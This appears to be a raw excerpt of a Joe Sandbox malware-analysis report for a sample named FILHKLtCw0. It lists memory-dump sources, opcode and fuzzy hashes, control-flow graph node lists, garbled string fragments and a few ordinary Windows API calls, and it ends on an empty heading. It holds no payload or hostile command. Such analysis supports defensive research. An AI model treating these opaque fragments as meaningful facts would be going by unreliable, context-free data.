                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6b5fcb5ca7aac1a2b35034f46db2bb3b7b1bcc159728d7256816bfee9dbd7a18
                                                                                                              • Instruction ID: eb8e051a87296baaad90a73d0dda17c255f7552fdc3143a5a2daa025fa4d8809
                                                                                                              • Opcode Fuzzy Hash: 6b5fcb5ca7aac1a2b35034f46db2bb3b7b1bcc159728d7256816bfee9dbd7a18
                                                                                                              • Instruction Fuzzy Hash: CF5166B1E016188FEB58CF6BC945789FBF3AFC9204F14C1AAC50CA7265DB741A868F51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e6c821ffba91b01890b118b74575a481402b760ab2da970b7eec82bf84407364
                                                                                                              • Instruction ID: e00a178a74944092f4c751bacfe9da63b55a6114681ebe676d32a329892159a6
                                                                                                              • Opcode Fuzzy Hash: e6c821ffba91b01890b118b74575a481402b760ab2da970b7eec82bf84407364
                                                                                                              • Instruction Fuzzy Hash: A04166B1E016188FEB58CF6BC9457C9FAF3AFC9200F14C1AAC50CA6264DB740A868F51

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 1166b8-1166ed 1 1166f3-116716 0->1 2 116b1c-116b20 0->2 11 1167c4-1167c8 1->11 12 11671c-116729 1->12 3 116b22-116b36 2->3 4 116b39-116b47 2->4 9 116b49-116b5e 4->9 10 116bb8-116bcd 4->10 18 116b60-116b63 9->18 19 116b65-116b72 9->19 20 116bd4-116be1 10->20 21 116bcf-116bd2 10->21 15 116810-116819 11->15 16 1167ca-1167d8 11->16 24 116738 12->24 25 11672b-116736 12->25 22 116c2f 15->22 23 11681f-116829 15->23 16->15 36 1167da-1167f5 16->36 26 116b74-116bb5 18->26 19->26 27 116be3-116c1e 20->27 21->27 30 116c34-116c64 22->30 23->2 28 11682f-116838 23->28 31 11673a-11673c 24->31 25->31 76 116c25-116c2c 27->76 34 116847-116853 28->34 35 11683a-11683f 28->35 63 116c66-116c7c 30->63 64 116c7d-116c84 30->64 31->11 38 116742-1167a4 31->38 34->30 41 116859-11685f 34->41 35->34 57 116803 36->57 58 1167f7-116801 36->58 87 1167a6 38->87 88 1167aa-1167c1 38->88 42 116865-116875 41->42 43 116b06-116b0a 41->43 55 116877-116887 42->55 56 116889-11688b 42->56 43->22 47 116b10-116b16 43->47 47->2 47->28 61 11688e-116894 55->61 56->61 62 116805-116807 57->62 58->62 61->43 69 11689a-1168a9 61->69 62->15 70 116809 62->70 72 116957-116982 call 116500 * 2 69->72 73 1168af 69->73 70->15 93 116988-11698c 72->93 94 116a6c-116a86 72->94 78 1168b2-1168c3 73->78 78->30 80 1168c9-1168db 78->80 80->30 83 1168e1-1168f9 80->83 145 1168fb call 116c98 83->145 146 1168fb call 116c88 83->146 86 116901-116911 86->43 90 116917-11691a 86->90 87->88 88->11 91 116924-116927 90->91 92 11691c-116922 90->92 91->22 95 11692d-116930 91->95 92->91 92->95 93->43 97 116992-116996 93->97 94->2 112 116a8c-116a90 94->112 100 116932-116936 95->100 101 116938-11693b 95->101 98 116998-1169a5 97->98 99 1169be-1169c4 97->99 115 1169b4 98->115 116 1169a7-1169b2 98->116 104 1169c6-1169ca 99->104 105 1169ff-116a05 99->105 100->101 103 116941-116945 100->103 101->22 101->103 103->22 110 11694b-116951 103->110 104->105 111 1169cc-1169d5 104->111 107 116a11-116a17 105->107 108 116a07-116a0b 105->108 113 116a23-116a25 107->113 114 116a19-116a1d 107->114 108->76 108->107 110->72 110->78 117 1169e4-1169fa 111->117 118 1169d7-1169dc 111->118 119 116a92-116a9c call 1153a8 112->119 120 116acc-116ad0 112->120 121 116a27-116a30 113->121 122 116a5a-116a5c 113->122 114->43 114->113 123 1169b6-1169b8 115->123 116->123 117->43 118->117 119->120 133 116a9e-116ab3 119->133 120->76 124 116ad6-116ada 120->124 127 116a32-116a37 121->127 128 116a3f-116a55 121->128 122->43 129 116a62-116a69 122->129 123->43 123->99 124->76 131 116ae0-116aed 124->131 127->128 128->43 136 116afc 131->136 137 116aef-116afa 131->137 133->120 142 116ab5-116aca 133->142 139 116afe-116b00 136->139 137->139 139->43 139->76 142->2 142->120 145->86 146->86
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285110613.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_110000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
                                                                                                              • API String ID: 0-1435242062
                                                                                                              • Opcode ID: f9c62b26ad1ec6944be3b8886bfb138e77b01eb5fe07f9f01b9fc6d53ddec329
                                                                                                              • Instruction ID: 306f9136988006ff2d764fa83e42e0252d8cab95cfc668f1677f9a70f57a7686
                                                                                                              • Opcode Fuzzy Hash: f9c62b26ad1ec6944be3b8886bfb138e77b01eb5fe07f9f01b9fc6d53ddec329
                                                                                                              • Instruction Fuzzy Hash: A8126C30A006099FCB18CF69D984ADEBBF6FF48314F1585A9E849DB2A1D731ED81CB50

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 395 39400980-39400a0f GetCurrentProcess 399 39400a11-39400a17 395->399 400 39400a18-39400a4c GetCurrentThread 395->400 399->400 401 39400a55-39400a89 GetCurrentProcess 400->401 402 39400a4e-39400a54 400->402 404 39400a92-39400aaa 401->404 405 39400a8b-39400a91 401->405 402->401 416 39400aad call 39400f31 404->416 417 39400aad call 39400b51 404->417 405->404 407 39400ab3-39400ae2 GetCurrentThreadId 409 39400ae4-39400aea 407->409 410 39400aeb-39400b4d 407->410 409->410 416->407 417->407
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 394009FE
                                                                                                              • GetCurrentThread.KERNEL32 ref: 39400A3B
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 39400A78
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 39400AD1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310887101.0000000039400000.00000040.00000800.00020000.00000000.sdmp, Offset: 39400000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_39400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Current$ProcessThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2063062207-0
                                                                                                              • Opcode ID: a1719e7eb0aa9515f2e0809ffb9c704fd0c4c1b80ef321c886b1f88878f52671
                                                                                                              • Instruction ID: 0dae2919542f7e5f6f45e3a1b8b9b22b5daff8194488e7802cf3aa8d6353ea3a
                                                                                                              • Opcode Fuzzy Hash: a1719e7eb0aa9515f2e0809ffb9c704fd0c4c1b80ef321c886b1f88878f52671
                                                                                                              • Instruction Fuzzy Hash: 8E5146B49002098FDB04DFA9C548BDEBBF5FF89310F208469E419A7360D779A940CFA5

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 664 1119b8-111a13 668 111a35-111a84 664->668 669 111a15-111a34 664->669 673 111a86-111a8d 668->673 674 111a9f 668->674 675 111a96-111a9d 673->675 676 111a8f-111a94 673->676 678 111aa7 674->678 677 111aaa-111abe 675->677 676->677 680 111ac0-111ac7 677->680 681 111ad4-111adc 677->681 678->677 682 111ac9-111acb 680->682 683 111acd-111ad2 680->683 684 111ade-111ae2 681->684 682->684 683->684 686 111b42-111b45 684->686 687 111ae4-111af9 684->687 688 111b47-111b5c 686->688 689 111b8d-111b93 686->689 687->686 694 111afb-111afe 687->694 688->689 696 111b5e-111b62 688->696 691 111b99-111b9b 689->691 692 11268e 689->692 691->692 695 111ba1-111ba6 691->695 699 112693-1126dc 692->699 697 111b00-111b02 694->697 698 111b1d-111b3b call 1102a8 694->698 700 11263c-112640 695->700 701 111bac 695->701 702 111b64-111b68 696->702 703 111b6a-111b88 call 1102a8 696->703 697->698 704 111b04-111b07 697->704 698->686 717 1126fa-1127b6 699->717 718 1126de-1126f9 699->718 706 112642-112645 700->706 707 112647-11268d 700->707 701->700 702->689 702->703 703->689 704->686 709 111b09-111b1b 704->709 706->699 706->707 709->686 709->698 718->717
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285110613.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_110000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Xaq$Xaq$Xaq$Xaq
                                                                                                              • API String ID: 0-4015495023
                                                                                                              • Opcode ID: 9bf907c20db010cc09747a95e50a6ae6f5012689cff4cf47aa0706f3a295ec0f
                                                                                                              • Instruction ID: 68ca7f48f9ac0a988c26e0be16d71a03836729f83b0a02cd398ef6c9125bc38b
                                                                                                              • Opcode Fuzzy Hash: 9bf907c20db010cc09747a95e50a6ae6f5012689cff4cf47aa0706f3a295ec0f
                                                                                                              • Instruction Fuzzy Hash: 53C1A132D442299FCB9A9F788C842D9BBB2FF99300F4544B6D84597166F7304EC6CB61

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 723 38edd548-38edd66d 742 38edd710-38edd741 723->742 743 38edd673-38edd6b9 723->743 750 38edd747-38edd75e 742->750 748 38edd6bb-38edd6bf 743->748 749 38edd6c4-38edd70f 743->749 748->749
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (N+64N+6$4']q$4']q$dr98
                                                                                                              • API String ID: 0-3598168181
                                                                                                              • Opcode ID: 2fbd413317314f1dcd9d574477a98894ad8d46c175b498d4c056a90c56b333ad
                                                                                                              • Instruction ID: 976b9816af7ebba48349cb30d1eee025ca78950bf4432ad49cdc4458b4dd0d7f
                                                                                                              • Opcode Fuzzy Hash: 2fbd413317314f1dcd9d574477a98894ad8d46c175b498d4c056a90c56b333ad
                                                                                                              • Instruction Fuzzy Hash: A8518C30A402098FCB05EFA8D551ADEBBF6FF89300F1145A9E005AB266DB35AD45CFA1

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 817 110b20-110b4a 818 110b51-110ba6 call 1107b4 817->818 819 110b4c 817->819 827 110bab-110bae call 110ec8 818->827 819->818 828 110bb4-110c7b call 1107b4 * 4 827->828 849 110c86-110c94 828->849 850 110c9d-110ca6 849->850 851 110cae-110cc6 call 1117b8 850->851 886 110cc9 call 111a40 851->886 887 110cc9 call 1119b8 851->887 888 110cc9 call 1119aa 851->888 853 110ccf-110ce7 call 112c88 881 110cea call 113168 853->881 882 110cea call 11324d 853->882 855 110cf0-110d05 857 110d0e-110d1a call 114328 855->857 858 110d20-110e88 857->858 881->855 882->855 886->853 887->853 888->853
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285110613.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_110000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LR]q$P*6$t"6
                                                                                                              • API String ID: 0-3134733790
                                                                                                              • Opcode ID: fd50340779b4983aa9f974c0c2f71500c39a13e3105db53c6784238801931e8e
                                                                                                              • Instruction ID: bc800517ea23d26b1ce220b59f7e1da1410ff976c12602b3ee8f88fa06a96381
                                                                                                              • Opcode Fuzzy Hash: fd50340779b4983aa9f974c0c2f71500c39a13e3105db53c6784238801931e8e
                                                                                                              • Instruction Fuzzy Hash: BDA10474E41A09CFCF48DFA8E986A9DBBF5FB89301F114228D405A7265DB786946CF80

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 890 110b30-110b4a 891 110b51-110cc6 call 1107b4 call 110ec8 call 1107b4 * 4 call 1117b8 890->891 892 110b4c 890->892 955 110cc9 call 111a40 891->955 956 110cc9 call 1119b8 891->956 957 110cc9 call 1119aa 891->957 892->891 926 110ccf-110ce7 call 112c88 959 110cea call 113168 926->959 960 110cea call 11324d 926->960 928 110cf0-110d1a call 114328 931 110d20-110e88 928->931 955->926 956->926 957->926 959->928 960->928
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285110613.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_110000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LR]q$P*6$t"6
                                                                                                              • API String ID: 0-3134733790
                                                                                                              • Opcode ID: 5706804c02ef0779c75f04089ffcdef0dc890a02d918237e91b2a48c058b0f00
                                                                                                              • Instruction ID: 9cd546bd60d30a5116f48d68d6a3ad097e55d2b2729a12b28c1029bfa24a87d2
                                                                                                              • Opcode Fuzzy Hash: 5706804c02ef0779c75f04089ffcdef0dc890a02d918237e91b2a48c058b0f00
                                                                                                              • Instruction Fuzzy Hash: CCA1F474E41A09CFCF48DFA8E98699DBBF5FF89301F114228E405A7265DB786946CF80

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 963 38ed7920-38ed7941 964 38ed7948-38ed797e 963->964 965 38ed7943 963->965 968 38ed7987-38ed79ae 964->968 965->964 970 38ed7b3d-38ed7b46 968->970 971 38ed79b4-38ed79cc 968->971 974 38ed7ae8-38ed7b03 971->974 976 38ed7b09-38ed7b2d 974->976 977 38ed79d1-38ed7ae7 974->977 976->970 977->974
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: <C98$<C98$<C98
                                                                                                              • API String ID: 0-1835208628
                                                                                                              • Opcode ID: 297befbabdba5b1cfd4fbff3e80733871a4058c061314fda3409da9a5affeca7
                                                                                                              • Instruction ID: 3f394ad3a27b7a1472a854d75c2771685f95b408ea1ad25cc6bead71a2e09e60
                                                                                                              • Opcode Fuzzy Hash: 297befbabdba5b1cfd4fbff3e80733871a4058c061314fda3409da9a5affeca7
                                                                                                              • Instruction Fuzzy Hash: 1E510174E01318CFDB14CFB5D954AAEBBB6BF88304F208529D809AB355DB395A4ACF40

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1936 114f00-114f22 1937 114f24-114f28 1936->1937 1938 114f38-114f43 1936->1938 1939 114f50-114f57 1937->1939 1940 114f2a-114f36 1937->1940 1941 114f49-114f4b 1938->1941 1942 114feb-115017 1938->1942 1944 114f77-114f80 1939->1944 1945 114f59-114f60 1939->1945 1940->1938 1940->1939 1943 114fe3-114fe8 1941->1943 1949 11501e-115076 1942->1949 2041 114f82 call 114ef0 1944->2041 2042 114f82 call 114f00 1944->2042 1945->1944 1946 114f62-114f6d 1945->1946 1948 114f73-114f75 1946->1948 1946->1949 1948->1943 1968 115085-115097 1949->1968 1969 115078-11507e 1949->1969 1950 114f88-114f8a 1952 114f92-114f9a 1950->1952 1953 114f8c-114f90 1950->1953 1955 114fa9-114fab 1952->1955 1956 114f9c-114fa1 1952->1956 1953->1952 1954 114fad-114fcc call 115968 1953->1954 1962 114fe1 1954->1962 1963 114fce-114fd7 1954->1963 1955->1943 1956->1955 1962->1943 2039 114fd9 call 119eb0 1963->2039 2040 114fd9 call 119f6d 1963->2040 1965 114fdf 1965->1943 1971 11512b-11512d 1968->1971 1972 11509d-1150a1 1968->1972 1969->1968 2037 11512f call 1152c8 1971->2037 2038 11512f call 1152ba 1971->2038 1973 1150b1-1150be 1972->1973 1974 1150a3-1150af 1972->1974 1982 1150c0-1150ca 1973->1982 1974->1982 1975 115135-11513b 1976 115147-11514e 1975->1976 1977 11513d-115143 1975->1977 1980 115145 1977->1980 1981 1151a9-115208 1977->1981 1980->1976 1997 11520f-115233 1981->1997 1985 1150f7-1150fb 1982->1985 1986 1150cc-1150db 1982->1986 1987 115107-11510b 1985->1987 1988 1150fd-115103 1985->1988 1994 1150eb-1150f5 1986->1994 1995 1150dd-1150e4 1986->1995 1987->1976 1993 11510d-115111 1987->1993 1991 115151-1151a2 1988->1991 1992 115105 1988->1992 1991->1981 1992->1976 1996 115117-115129 1993->1996 1993->1997 1994->1985 1995->1994 1996->1976 2005 115235-115237 1997->2005 2006 115239-11523b 1997->2006 2009 1152b1-1152b4 2005->2009 2010 11523d-115241 2006->2010 2011 11524c-11524e 2006->2011 2012 115243-115245 2010->2012 2013 115247-11524a 2010->2013 2014 115261-115267 2011->2014 2015 115250-115254 2011->2015 2012->2009 2013->2009 2020 115292-115294 2014->2020 2021 115269-115290 2014->2021 2018 115256-115258 2015->2018 2019 11525a-11525f 2015->2019 2018->2009 2019->2009 2023 11529b-11529d 2020->2023 2021->2023 2027 1152a3-1152a5 2023->2027 2028 11529f-1152a1 2023->2028 2029 1152a7-1152ac 2027->2029 2030 1152ae 2027->2030 2028->2009 2029->2009 2030->2009 2037->1975 2038->1975 2039->1965 2040->1965 2041->1950 2042->1950
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285110613.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_110000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Haq$Haq
                                                                                                              • API String ID: 0-4016896955
                                                                                                              • Opcode ID: c3ed0ad0c22732f15ab6656eed0971d12f81c0ca09cf8006237c6fd28d7de571
                                                                                                              • Instruction ID: 595c6cf83e1d0a25a52ea4dc1b0ee93f8f2462617f230d0e9ae8b272cc846286
                                                                                                              • Opcode Fuzzy Hash: c3ed0ad0c22732f15ab6656eed0971d12f81c0ca09cf8006237c6fd28d7de571
                                                                                                              • Instruction Fuzzy Hash: 81B1CF35308655CFCB199F28C894BAA7BE2AFC9300F154569E846CB3A1DB34CC82CB91
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285110613.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_110000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4']q$4']q
                                                                                                              • API String ID: 0-3120983240
                                                                                                              • Opcode ID: d3f3e6c4b7d1b33b6caa5dd77bdd96de2da5744a4fd47203a0f88e3abe6df8d0
                                                                                                              • Instruction ID: 7a7c0676bbdc1d6ab164e7a32d2e79cc249acc3f271ffbf4f7ef5a18dbffec5f
                                                                                                              • Opcode Fuzzy Hash: d3f3e6c4b7d1b33b6caa5dd77bdd96de2da5744a4fd47203a0f88e3abe6df8d0
                                                                                                              • Instruction Fuzzy Hash: 1AC191706046068FCB19CF68C490AEEBBF6AF85300F15C5BAE405DB252DB35ED86CB91
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285110613.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_110000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ,aq$,aq
                                                                                                              • API String ID: 0-2990736959
                                                                                                              • Opcode ID: d8e51bc431a622c460976f0cf64330e79f92a9e0d7b9763fd2e1c93cf453eb5d
                                                                                                              • Instruction ID: a1a55ec57adb35c0f6095f5b6f89092fade458ee2829109542a1c6fac4057cc2
                                                                                                              • Opcode Fuzzy Hash: d8e51bc431a622c460976f0cf64330e79f92a9e0d7b9763fd2e1c93cf453eb5d
                                                                                                              • Instruction Fuzzy Hash: BD812934A00905CFCB58CF69C8849EAB7B3BFC9315B658179D4159B365EB31EC81CB91
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4N+6$g98
                                                                                                              • API String ID: 0-4197494078
                                                                                                              • Opcode ID: a9d997758754e870fa5aaf876da529beb254470b5cdc7cb666bf06f863576df1
                                                                                                              • Instruction ID: cc0c880e1eac4a525ffe61a4f7534eaacbe4b22a30c69c191d603a819e71751e
                                                                                                              • Opcode Fuzzy Hash: a9d997758754e870fa5aaf876da529beb254470b5cdc7cb666bf06f863576df1
                                                                                                              • Instruction Fuzzy Hash: CD712975E00219DFDB15DFB4C8586ADBBB6FF89304F208129E406AB390DB399946CF81
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285110613.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_110000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4']q$4']q
                                                                                                              • API String ID: 0-3120983240
                                                                                                              • Opcode ID: 9ec9c24f7b0710c9f2a90e95ad0c12bfd450b2875d1f63805cccd94b0fd745a6
                                                                                                              • Instruction ID: f5acad9b805418ae055575704f8211d2bdf4b942d8d628417fe6a162086062cb
                                                                                                              • Opcode Fuzzy Hash: 9ec9c24f7b0710c9f2a90e95ad0c12bfd450b2875d1f63805cccd94b0fd745a6
                                                                                                              • Instruction Fuzzy Hash: 2151B0303012449FDB08DF69C840BEABBE6EF89350F14C476E909CB2A1DB75CD818BA1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285110613.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_110000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Xaq$Xaq
                                                                                                              • API String ID: 0-1488805882
                                                                                                              • Opcode ID: 883438dd071eb1f77eb1c3c27704ac82961fab9453d16a61e4c7af05ebee259d
                                                                                                              • Instruction ID: 83aa3c047ae7b76e595cfb8d15406ad3e4a7b7ed9e4f37e04bacebca3f28f594
                                                                                                              • Opcode Fuzzy Hash: 883438dd071eb1f77eb1c3c27704ac82961fab9453d16a61e4c7af05ebee259d
                                                                                                              • Instruction Fuzzy Hash: 0731E431B002258BDF1C4AAAE9943FEA5EABBC4350F15443DD902D3394EF78CCD59291
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285110613.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_110000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $]q$$]q
                                                                                                              • API String ID: 0-127220927
                                                                                                              • Opcode ID: daf64720769856a38c5f21f1ee6a53f2df24f77f9c89340ae1020940eb7695bb
                                                                                                              • Instruction ID: dc42b6f93e77c247656188739401bc2c7846a5b61deb44133a77dff72b1608af
                                                                                                              • Opcode Fuzzy Hash: daf64720769856a38c5f21f1ee6a53f2df24f77f9c89340ae1020940eb7695bb
                                                                                                              • Instruction Fuzzy Hash: 9C3132303092464FDB2D8F29CC9497E7B75AB85700B2545BAE066CB3E1DB68DCC2C7A1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4N+6$g98
                                                                                                              • API String ID: 0-4197494078
                                                                                                              • Opcode ID: 176c7bad84b79cbc7a2fd28fc41a26dc2baa6979f5c5586609d1234c0c6670de
                                                                                                              • Instruction ID: 1e524a07eefc287f97cfaa154dd7537e06c6ef5772f0515f507acd30f80a2681
                                                                                                              • Opcode Fuzzy Hash: 176c7bad84b79cbc7a2fd28fc41a26dc2baa6979f5c5586609d1234c0c6670de
                                                                                                              • Instruction Fuzzy Hash: 55318139E003058FDB19DBB5C4686AD7BF6AF89344F14452AD806EB394DF398846CF51
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: <C98$<C98
                                                                                                              • API String ID: 0-2250919751
                                                                                                              • Opcode ID: cfb63831474f706f0b04b71fdcacdb2c47b56e27d62e3a004db7d605b57ae477
                                                                                                              • Instruction ID: 6052cccff25900beaa0badbf0d748ba3fabfd2b634fc254b14db0836775f2426
                                                                                                              • Opcode Fuzzy Hash: cfb63831474f706f0b04b71fdcacdb2c47b56e27d62e3a004db7d605b57ae477
                                                                                                              • Instruction Fuzzy Hash: 7D211575D02318DFEB04CFA1D8547EEBBB2AF89304F508429D818BB240DB795A8ACF51
                                                                                                              APIs
                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 39400222
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310887101.0000000039400000.00000040.00000800.00020000.00000000.sdmp, Offset: 39400000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_39400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 716092398-0
                                                                                                              • Opcode ID: 63e973393c3cfa41aa70444120a7cdee8c8a4209359ee5f8764c5bbd3bd344af
                                                                                                              • Instruction ID: 501c6cee5a0b547b8844e23b317585f2dee8c1c2978ef4df66ef8141752ce74e
                                                                                                              • Opcode Fuzzy Hash: 63e973393c3cfa41aa70444120a7cdee8c8a4209359ee5f8764c5bbd3bd344af
                                                                                                              • Instruction Fuzzy Hash: D351BFB5D003499FDB14CFA9C894ADEBBB5BF49300F64812AE819AB310D775A881CF90
                                                                                                              APIs
                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 39400222
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310887101.0000000039400000.00000040.00000800.00020000.00000000.sdmp, Offset: 39400000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_39400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 716092398-0
                                                                                                              • Opcode ID: 7eafc856d09335f9da753fe4f5570659c5cf76a24216db89fd995c3b598b52fa
                                                                                                              • Instruction ID: 6c55c04175c27deb7805c18376bdb6d2fabe9b1665f84b32ef406c4d8e046bc1
                                                                                                              • Opcode Fuzzy Hash: 7eafc856d09335f9da753fe4f5570659c5cf76a24216db89fd995c3b598b52fa
                                                                                                              • Instruction Fuzzy Hash: 9141B1B1D003499FDB14CF99C894ADEFBB5BF48310F20812AE819AB210D775A985CF90
                                                                                                              APIs
